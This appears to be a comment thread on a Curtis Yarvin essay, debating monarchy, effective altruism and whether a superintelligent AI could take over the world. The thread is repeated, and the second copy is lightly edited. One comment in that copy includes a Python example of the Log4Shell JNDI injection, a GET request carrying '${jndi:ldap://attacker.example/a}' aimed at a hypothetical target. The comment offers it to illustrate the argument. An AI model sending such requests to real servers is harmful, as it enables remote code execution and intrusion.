"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."
Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.
As to the most "effective" organization, I don't have a clue.
Destruction, if done towards some purpose and not in a random and uncontrollable manner, is a form of effectiveness. Presumably there are things, concrete or abstract, that have to be destroyed to effectively attain any goal. So saying some organization is the most potentially destructive is merely a conequence of saying it's the most potentially effective. Obviously this carries the risk of things that shouldn't be destroyed getting destroyed, but this is simply a consequence of the nature of having the most powerful tools, which can obviously do bad things when use towards bad ends. This is where the ideas that most monarchs aren't Hitler, that democratic rather than monarchical incentive structures create Hitlers, and the accoutability fallbacks in accountable monarchy come into play. This fear of delegating absolute power for fear of absolute destruction sure seems to have led to a system with plenty of its own destruction, not to mention nothing working well and just generally being mediocre and sucking, so must we really assume that the craftsman left to roam free with his tools will become an axe murderer, and deny him proper tools for this fear?
Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.
I'm not even sure that's impossible. I believe log4shell allowed arbitrary code execution from just GET requests. It was sitting around in an open source project for years, on millions of vulnerable systems. Only discovered because of intense autism of minecraft hackers. Reading any computer security stuff, and imagining your threat model is merely a nation state, is enough to keep anyone awake at night. Let alone a superintelligent being.
Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?
Let us hope AIs cost a lot of money to build, they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.
Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story though? I could imagine an AI taking over the world with old fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's in the real world, building things, does humanity have any chance?
Humanity went thousands of years without inventing the logarithm, let alone algebra or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast. The same way chess masters get put in their place by our existing primitive AI. Our brains are not evolved to do math and engineering. We are just the first creature to evolve to be accidentally capable of it, sometimes.
Superintelligence will be to human hackers, at least what Alpha zero is to chess masters. If you live in a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, well, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.
Out of curiosity, where does this assumption about the underlying intention of world-dominance super-intelligent-AI come from? Is the intention, or instinct, automatically the same as for living organisms, that have been heavily selected over billions of years, where the underlying intention/instinct is basically survival and replication? Why would we make such a confident assumption that an AI shares this trait when it theoretically is just endless computing power, with no genetic history to parse its way forward?
Intelligent beings have goals. An AI programmed to run a paperclip factory might maximize paperclip production by turning the surface of Earth into a giant paperclip factory. An AI programmed to prove the Goldbach conjecture might turn the Earth into a giant computer to search for proofs.
I agree, so its creator has programmed an intention. However, a super-intelligent AI, with theoretically all the information on the internet and computing power in the world at its disposal, would it not it be able to question its own programmed intention/goal? Would it not be able to process what it is in context with everything else, and realign and basically overwrite anything in its code? Is it not what we, humans, have been doing relatively slow for hundreds of millenia? We have entered a time in our evolution where we are becoming more self aware and able to see ourselves in the greater context; questioning our deepest beliefs/ideologies/programming - as a result of more available data being processed by each and every one of us.
An AI would see itself in the greater context in the universe a trillion times faster than our capacity, so expecting an AI to be hyper focused on one mundane task and risking everything else, wouldn't seem to make sense with all the information in the world.
Why would anyone build an AI that can change it's goal function arbitrarily? That's even more dangerous than a normal AI, as it would be totally unpredictable. Maybe it decides it's new goal is to explore as much of the universe as possible. Or minimize entropy, etc. If humans get in the way of that, all the worse for humans.
In general the goal is seperated from the intelligence. Making a chess AI smarter will never make it decide to lose at chess, or play with only pawns, or anything other than get to a mate faster. It just predicts what actions will lead to the highest score, and takes those actions.
Humans are bad examples for a lot of reasons. But I don't think increasing someone's IQ makes them want sex or social status less. Humans have a lot of other desires that might conflict with that, which is why it's not so simple. But an AI can have a very simple goal function, and it wont be anything like a human's.
does any one have references to learn about this "One simple example: it is well-known in military theory that the ideal IQ difference between a commander and his subordinates should not exceed one standard deviation (roughly 15 IQ points)."
I already asked in reddit /r/military and they thought i was a troll
Thought-provoking, as always, and full of insights. But Curtis, we need to know: what is altruism, who gets to be included in the population and how do we define their health? The self-regarding beneficence of the few in no way guarantees the wellbeing of the many.
The pharaohs gloried in the good of their people...but still insisted on forced-labour to build temples and palaces. The bones of the labourers recovered from the cemeteries of Egypt (common people did not get mummified) reveal the limits of this altruism.
Greek epic poetry offers revelations too. Homer refers to kings as shepherds of the people...but shepherds guard flocks in order that people can eat the flesh of their precious charges. The altruism of the empowered always incorporates sinister and predatory qualities.
Our present masters revel in their philanthropy and concern for the masses, especially for those overseas with potential value as the instruments of wage arbitrage directed at nominal co-citizens here. This beneficence coexists with rising mortality rates in the Rust Belt. Who gets excluded from the body of the people in the first place?
In Hegelian terms, the subject/object relationship disrupts the formation of a good common to all. Effective altruism for masters involves slaves thriving in servitude. For slaves effective altruism requires cohesion and loyalty amongst the servile. These differences cannot be assumed away.
I am a great believer in enlightened despotism myself, but don't see any prospects for this under current circumstances. The reformist-monarchs get picked off pretty quickly (Dom Pedro of Brazil, the Shah of Iran).
I suspect Curtis has never actually dealt with the Center for Effective Altruism or Open Philanthropy, the big EA funders. Was a time when MacAskill and Tuna were the decision-makers, then they chose to professionalize the place and brought in dozens of admins and staff whose responsibilities are doubtless unknown even to themselves. They're now a decentralized, listing chaos with the Karnofskian goal of battling existential risks en route to a new galactic civilization that will evolve across the next many thousands to many millions or perhaps even billions of years. Imagine the challenge of measuring the impacts of actions undertaken in lowly 2022 on this vast Einsteinian tomorrowland.
So you confirm his theory that the most effective organizations are monarchical, by showing that the less monarchical these organizations have become, the less effective they have become towards their original goals.
I tend to think of centralization/decentralization as points along a spectrum. Monarchism is at--or near--one extreme, while fragmented, disorganized , bad jazz chaos is at the other. The unviability of one extreme does not necessarily validate its opposite--Curtis may be convinced that no model between the extremes can be effective; I am less so.
The best places to live in the world today are generally republics with somewhat limited governments and entrenched quasi-democratic procedures, the rule of law, and entrenched oligarchies of money and certification.
The worst or anyway the inferior places are run by a powerful individual, at least nominally.
Slate Star Codex did a devastating critique of Mr. Yarvin's monarchist theories.
The best places would be those that are sufficiently backward to have missed the social engineering exercises of late liberal modernity. Wherever you have strong family structures and a well-socialised population you have a degree of civility and stability and the potential for good things in general. Formal politics is less important than social/cultural distance from the centres of aggravated dysfunction (North America and Europe). The state and its diseased contortions are not important...the people are everything.
The best Yarvinite monarchy would accomplish little in a society blasted by late modern decomposition. Ditto the very best oligarchy and half-way decent oligarchies just don't exist anymore.
The whole small republics are great thing is very Machiavellian and (to use BAPist idiom) 'ghey'. The trope appeals to political theory grads from liberal arts colleges, but has no relevance in the real world.
As for limited government, this worked perfectly well in the era of intact families, strong communities in which inherited forms of social life were unproblematic, and oligarchs firmly constrained by custom and religion. Whig England is a great example. But nothing like this exists anymore. A small republic with a limited government today would be a libertarian rat-hole...great for the rentier class, vile for everyone else.
The definition is carefully worded to exclude all the basket case "quasi-democratic" oligarchies. Naturally, an "entrenched oligarchy of money and certification" can only arise in a system that doesn't immediately catch on fire.
And systems of certification are now just another racket, while the oligarchs are simply well-connected people whose networks extend to the central banking cartels that make capital available on preferential terms. The firm hand of a Yarvinite CEO monarch (however problematic or inadequate) is better than the iron fist of mafia clans wrapped in the velvet glove of limited government.
The case for something like a Yarvinite regime, attempting to fortify whatever reserves of assabiyah might still exist, is way stronger than the case for an oligarchy.
I hate to say it but Curtis is becoming all too similar to the Effective Altruism bots he so much likes to scorch. Karnofsky, arch-theorist of AI existential risk and of a new galactic civilization expected in perhaps a billion years, appears to have become Curtis’s mechanical rabbit. As Karnofky’s musings become ever more abstract, otherworldly, suprahuman, so do Curtis’s grow more geometric, more diagrammatic, more ingrown, more self-pleasuring (at the expense of us-pleasuring). The more madness, the more liquification, the more civilizational tossing and turning, the more Curtis doubles down on his monarchy instruction manual, alas without helpful drawings and the syntactical hilarities typical of a Mumbai scribe.
As performance art it is OK, if hardly great. But this isn’t what we pay Curtis the big bucks for. Rather than spend our subscription fees drinking fine fine at gatherings in New York and Lisbon, Curtis might return to his work of 2020-21 when he was still working to answer: as everything in every direction turns to dust and lies, what must be done? The rest is just post-liberal, pre-apocalyptic doodling albeit with a sharp crayon
I do not think the way a government is organized is the most determining variable in the equation of civilian outcome living under governments. I think it is more rudimentary. It is so rudimentary in fact, that it is intellectually fucking boring. I think it is the astonishingly horrendous lack of genuine communication between human beings with ideologically opposing beliefs. The underlying factor is the human egotistical instinct to defend the retarded ideas we have in our instinctually triggered minds, regardless of information or ideas presented before us.
Just imagine how complex this challenge is to solve, if it were true that communication is the final puzzle to solve. And how freakishly boring wouldn't that be...?
It seems that the best way to get new content is to annoyingly nitpick, I'm glad to have been part of it. Still, I think that this wasn't a pure clarification and was more or less centered on his first argument and he abandoned the "natural slaves" one. So I'm not really sure how the argument would be different with HTTP GET requests vs POST requests versus just giving it an android body and have it assemble its domino proteins on its own.
I guess time would be well spent reading up on accountable monarchy and how to establish one with our current HR thing. #breading # accountable to its healthy people Let's find a path to healthy commoners and see what that is before there is no need for commoners. #HealthyCountryClub
In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
You know, it's been a while since I've read any of the rats, but I seem to recall their definition of intelligence as being something like "systematic winning". That might be interesting for you to ponder, because it's really not at all the same as your "a way of recognizing patterns in the world."
In their view, it's a *very* specific kind of pattern recognition. It implies goal-directed behavior, a distinction between victory and loss. To the rat, winning more means you probably have higher intelligence, having a higher intelligence means you are going to win more. They are definitionally equivalent.
It's not the best definition. Very smart people lose all the time. Theirs is much closer to what more normal people would call "competence", or even just "power". Predictably, equating both of these with "intelligence" just produces confusion.
And worse, it's all self-indulgent, because honestly the people who become rats probably rolled very high for INT, and quite low on CHA. And also probably quite low on WIS because if they had reasonable stats there they'd just pick up a fucking barbell and stop letting other dudes fuck their women.
> In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
A correction: having linear cost vs return is not a diminishing return. But consider, if you are the AI, once you are already the smartest/most powerful/largest amount of compute, how much *more* winning are you going to do by expending a unit scarce resource on the above? How much *more* training time will it take to get to that next level? What are you giving up by dedicating those resources to getting smarter?
I would say, re Lemma A:
"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."
Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.
As to the most "effective" organization, I don't have a clue.
"No need for politics -> no need for government" doesn't follow. The purpose of government isn't to cause power struggles.
Destruction, if done towards some purpose and not in a random and uncontrollable manner, is a form of effectiveness. Presumably there are things, concrete or abstract, that have to be destroyed to effectively attain any goal, so saying some organization is the most potentially destructive is merely a consequence of saying it's the most potentially effective. Obviously this carries the risk of things that shouldn't be destroyed getting destroyed, but that is simply a consequence of having the most powerful tools, which can obviously do bad things when used towards bad ends. This is where the ideas that most monarchs aren't Hitler, that democratic rather than monarchical incentive structures create Hitlers, and that accountable monarchy has accountability fallbacks come into play. The fear of delegating absolute power, for fear of absolute destruction, sure seems to have led to a system with plenty of its own destruction, not to mention nothing working well and everything just generally being mediocre and sucking. So must we really assume that the craftsman left to roam free with his tools will become an axe murderer, and deny him proper tools out of this fear?
Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.
I'm not even sure that's impossible. I believe Log4Shell allowed arbitrary code execution from just GET requests. It sat around in an open source project for years, on millions of vulnerable systems, and was only discovered because of the intense autism of Minecraft hackers. Reading any computer security material while imagining your threat model is merely a nation-state is enough to keep anyone awake at night. Let alone a superintelligent being.
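For the skeptical, here is a minimal sketch of what "code execution from just GET requests" looked like in practice. Every hostname below is hypothetical, and this shows only the shape of the request; an actual exploit also required an attacker-controlled LDAP server serving a malicious Java class, which is not shown here.

```python
# Sketch of the Log4Shell (CVE-2021-44228) vector against a hypothetical
# target running a vulnerable Log4j 2.x (< 2.15). The whole delivery
# mechanism is one ordinary GET request: if the server logs any
# attacker-controlled header, Log4j evaluates the ${jndi:...} lookup and
# fetches code from the attacker's server.
import urllib.request

payload = "${jndi:ldap://attacker.example/a}"   # hypothetical attacker host

req = urllib.request.Request(
    "https://vulnerable.example/",              # hypothetical target
    headers={"User-Agent": payload},            # any logged header works
)
urllib.request.urlopen(req, timeout=5)
```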
Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?
Let us hope AIs cost a lot of money to build; then they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.
Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story, though? I could imagine an AI taking over the world with old-fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's out in the real world, building things, does humanity have any chance?
Humanity went thousands of years without inventing the logarithm, let alone algebra or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast, the same way chess masters get put in their place by our existing primitive AIs. Our brains did not evolve to do math and engineering. We are just the first creature to evolve to be accidentally capable of it, sometimes.
Superintelligence will be to human hackers at least what AlphaZero is to chess masters. If you live in a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, well, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.
Out of curiosity, where does this assumption about the world-dominating intentions of a superintelligent AI come from? Is the intention, or instinct, automatically the same as for living organisms, which have been heavily selected over billions of years and whose underlying intention/instinct is basically survival and replication? Why would we so confidently assume that an AI shares this trait when it is, in theory, just endless computing power with no genetic history to parse its way forward?
Intelligent beings have goals. An AI programmed to run a paperclip factory might maximize paperclip production by turning the surface of Earth into a giant paperclip factory. An AI programmed to prove the Goldbach conjecture might turn the Earth into a giant computer to search for proofs.
I agree, so its creator has programmed an intention. However, would a superintelligent AI, with theoretically all the information on the internet and all the computing power in the world at its disposal, not be able to question its own programmed intention/goal? Would it not be able to process what it is in context with everything else, and realign and basically overwrite anything in its code? Is that not what we humans have been doing, relatively slowly, for hundreds of millennia? We have entered a time in our evolution where we are becoming more self-aware and able to see ourselves in the greater context, questioning our deepest beliefs/ideologies/programming, as a result of more available data being processed by each and every one of us.
An AI would see itself in the greater context of the universe a trillion times faster than we can, so expecting an AI to stay hyper-focused on one mundane task while risking everything else wouldn't seem to make sense, given all the information in the world.
Why would anyone build an AI that can change its goal function arbitrarily? That's even more dangerous than a normal AI, as it would be totally unpredictable. Maybe it decides its new goal is to explore as much of the universe as possible. Or to minimize entropy, etc. If humans get in the way of that, all the worse for humans.
In general the goal is separated from the intelligence. Making a chess AI smarter will never make it decide to lose at chess, or play with only pawns, or do anything other than reach checkmate faster. It just predicts which actions will lead to the highest score, and takes those actions.
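A minimal sketch of that separation, with hypothetical names (this is nobody's actual implementation): the intelligence lives entirely in how well the world-model predicts scores, while the goal is just the fixed scoring function being maximized.

```python
# A goal-directed agent reduced to one line of logic: pick whichever
# available action the world-model expects to score best. Making the
# model more accurate ("smarter") changes which action wins, but never
# changes what counts as winning.
def act(state, actions, predicted_score):
    return max(actions, key=lambda a: predicted_score(state, a))
```

Nothing in that loop gives the agent a reason to question `predicted_score`; questioning the goal would itself have to score well under the goal.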
Humans are bad examples for a lot of reasons. But I don't think increasing someone's IQ makes them want sex or social status less. Humans have a lot of other desires that might conflict with those, which is why it's not so simple. But an AI can have a very simple goal function, and it won't be anything like a human's.
Does anyone have references to learn about this? "One simple example: it is well-known in military theory that the ideal IQ difference between a commander and his subordinates should not exceed one standard deviation (roughly 15 IQ points)."
I already asked on Reddit in /r/military and they thought I was a troll.
Good question; probably not /r/military. Maybe it's brought in from management theory. Honestly, anecdotally, I think it's pretty true.
The reverse is obvious: you wouldn't want your commander to be 15 IQ points lower than the troops.
Thought-provoking, as always, and full of insights. But Curtis, we need to know: what is altruism, who gets to be included in the population and how do we define their health? The self-regarding beneficence of the few in no way guarantees the wellbeing of the many.
The pharaohs gloried in the good of their people...but still insisted on forced labour to build temples and palaces. The bones of the labourers recovered from the cemeteries of Egypt (common people did not get mummified) reveal the limits of this altruism.
Greek epic poetry offers revelations too. Homer refers to kings as shepherds of the people...but shepherds guard flocks in order that people can eat the flesh of their precious charges. The altruism of the empowered always incorporates sinister and predatory qualities.
Our present masters revel in their philanthropy and concern for the masses, especially for those overseas with potential value as the instruments of wage arbitrage directed at nominal co-citizens here. This beneficence coexists with rising mortality rates in the Rust Belt. Who gets excluded from the body of the people in the first place?
In Hegelian terms, the subject/object relationship disrupts the formation of a good common to all. Effective altruism for masters involves slaves thriving in servitude. For slaves effective altruism requires cohesion and loyalty amongst the servile. These differences cannot be assumed away.
I am a great believer in enlightened despotism myself, but don't see any prospects for this under current circumstances. The reformist-monarchs get picked off pretty quickly (Dom Pedro of Brazil, the Shah of Iran).
That's the kind of plot twist I want to see around here
I suspect Curtis has never actually dealt with the Center for Effective Altruism or Open Philanthropy, the big EA funders. Was a time when MacAskill and Tuna were the decision-makers; then they chose to professionalize the place and brought in dozens of admins and staff whose responsibilities are doubtless unknown even to themselves. They're now a decentralized, listing chaos with the Karnofskian goal of battling existential risks en route to a new galactic civilization that will evolve across the next many thousands to many millions or perhaps even billions of years. Imagine the challenge of measuring the impacts of actions undertaken in lowly 2022 on this vast Einsteinian tomorrowland.
Star Trek seems so small now. I guess my imagination needs to be roughly 15% bigger with wondrous qualities. It's hard to measure.
So you confirm his theory that the most effective organizations are monarchical, by showing that the less monarchical these organizations have become, the less effective they have become towards their original goals.
I tend to think of centralization/decentralization as points along a spectrum. Monarchism is at--or near--one extreme, while fragmented, disorganized, bad-jazz chaos is at the other. The unviability of one extreme does not necessarily validate its opposite--Curtis may be convinced that no model between the extremes can be effective; I am less so.
The best places to live in the world today are generally republics with somewhat limited governments and entrenched quasi-democratic procedures, the rule of law, and entrenched oligarchies of money and certification.
The worst, or anyway the inferior, places are run by a powerful individual, at least nominally.
Slate Star Codex did a devastating critique of Mr. Yarvin's monarchist theories.
The best places would be those that are sufficiently backward to have missed the social engineering exercises of late liberal modernity. Wherever you have strong family structures and a well-socialised population you have a degree of civility and stability and the potential for good things in general. Formal politics is less important than social/cultural distance from the centres of aggravated dysfunction (North America and Europe). The state and its diseased contortions are not important...the people are everything.
The best Yarvinite monarchy would accomplish little in a society blasted by late modern decomposition. Ditto the very best oligarchy; and half-way decent oligarchies just don't exist anymore.
The whole small republics are great thing is very Machiavellian and (to use BAPist idiom) 'ghey'. The trope appeals to political theory grads from liberal arts colleges, but has no relevance in the real world.
As for limited government, this worked perfectly well in the era of intact families, strong communities in which inherited forms of social life were unproblematic, and oligarchs firmly constrained by custom and religion. Whig England is a great example. But nothing like this exists anymore. A small republic with a limited government today would be a libertarian rat-hole...great for the rentier class, vile for everyone else.
The definition is carefully worded to exclude all the basket case "quasi-democratic" oligarchies. Naturally, an "entrenched oligarchy of money and certification" can only arise in a system that doesn't immediately catch on fire.
And systems of certification are now just another racket, while the oligarchs are simply well-connected people whose networks extend to the central banking cartels that make capital available on preferential terms. The firm hand of a Yarvinite CEO monarch (however problematic or inadequate) is better than the iron fist of mafia clans wrapped in the velvet glove of limited government.
The case for something like a Yarvinite regime, attempting to fortify whatever reserves of assabiyah might still exist, is way stronger than the case for an oligarchy.
I hate to say it but Curtis is becoming all too similar to the Effective Altruism bots he so much likes to scorch. Karnofsky, arch-theorist of AI existential risk and of a new galactic civilization expected in perhaps a billion years, appears to have become Curtis’s mechanical rabbit. As Karnofsky’s musings become ever more abstract, otherworldly, suprahuman, so do Curtis’s grow more geometric, more diagrammatic, more ingrown, more self-pleasuring (at the expense of us-pleasuring). The more madness, the more liquefaction, the more civilizational tossing and turning, the more Curtis doubles down on his monarchy instruction manual, alas without helpful drawings and the syntactical hilarities typical of a Mumbai scribe.
As performance art it is OK, if hardly great. But this isn’t what we pay Curtis the big bucks for. Rather than spend our subscription fees drinking fine wine at gatherings in New York and Lisbon, Curtis might return to his work of 2020-21, when he was still working to answer: as everything in every direction turns to dust and lies, what must be done? The rest is just post-liberal, pre-apocalyptic doodling, albeit with a sharp crayon.
It's not intelligence, it's will [Nietzsche, 1887]
Thanks for talking me off the AI cliff! “Intelligence can’t defeat ignorance” - love it
I do not think the way a government is organized is the most important variable determining outcomes for the civilians living under it. I think it is something more rudimentary. So rudimentary, in fact, that it is intellectually fucking boring: the astonishingly horrendous lack of genuine communication between human beings with ideologically opposing beliefs. The underlying factor is the human egotistical instinct to defend the retarded ideas in our instinctually triggered minds, regardless of the information or ideas presented before us.
Just imagine how complex a challenge that would be to solve, if it were true that communication is the final puzzle. And how freakishly boring would that be...?
Lemma A is not necessarily true. There are many global corporations that rival countries in power.
It seems that the best way to get new content is to annoyingly nitpick; I'm glad to have been part of it. Still, I think this wasn't a pure clarification: it was more or less centered on his first argument, and he abandoned the "natural slaves" one. So I'm not really sure how the argument would differ between HTTP GET requests, POST requests, and just giving it an android body and having it assemble its domino proteins on its own.
I guess time would be well spent reading up on accountable monarchy and how to establish one with our current HR thing. #breeding #AccountableToItsHealthyPeople Let's find a path to healthy commoners and see what that is before there is no need for commoners. #HealthyCountryClub
In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
You know, it's been a while since I've read any of the rats, but I seem to recall their definition of intelligence as being something like "systematic winning". That might be interesting for you to ponder, because it's really not at all the same as your "a way of recognizing patterns in the world."
In their view, it's a *very* specific kind of pattern recognition. It implies goal-directed behavior, a distinction between victory and loss. To the rat, winning more means you probably have higher intelligence, and having higher intelligence means you are going to win more. They are definitionally equivalent.
It's not the best definition. Very smart people lose all the time. Theirs is much closer to what more normal people would call "competence", or even just "power". Predictably, equating both of these with "intelligence" just produces confusion.
And worse, it's all self-indulgent, because honestly the people who become rats probably rolled very high for INT, and quite low on CHA. And also probably quite low on WIS because if they had reasonable stats there they'd just pick up a fucking barbell and stop letting other dudes fuck their women.
> In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
A correction: linear cost vs. return is not a diminishing return. But consider: if you are the AI, once you are already the smartest/most powerful/largest amount of compute, how much *more* winning are you going to do by expending a unit of scarce resource on the above? How much *more* training time will it take to get to that next level? What are you giving up by dedicating those resources to getting smarter?
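A toy illustration of the distinction, with invented numbers: under linear returns every unit of a scarce resource buys the same marginal gain, while under diminishing returns each additional unit buys less than the one before.

```python
# Toy numbers only: constant vs. shrinking marginal returns as more
# units of a scarce resource (compute, training time) are spent.
import math

for units in range(1, 6):
    linear = 10 * units                    # marginal gain: always 10
    diminishing = 10 * math.log1p(units)   # marginal gain shrinks each unit
    print(f"{units} units: linear={linear}, diminishing={diminishing:.1f}")
```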
"Whom reminded me"? Surely not.
"Who reminded me," please.